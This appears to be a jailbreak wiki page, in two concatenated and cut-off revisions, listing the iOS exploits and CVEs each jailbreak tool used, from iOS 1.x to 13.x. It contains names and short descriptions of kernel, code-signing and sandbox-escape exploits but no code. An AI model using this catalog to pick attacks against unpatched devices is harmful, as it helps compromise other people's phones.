* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{CVE|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{CVE|2020-3836}})

13.0 - 13.5 (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

Jailbreak Exploits

2020-07-23T01:32:58Z

Inflatable Man: I corrected the capitalization of "lightspeed" ("LightSpeed") and added the AppleAVE2Driver exploit and AppleSPUProfileDriver info leak that is used in unc0ver to jailbreak iOS 12.4.1.

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
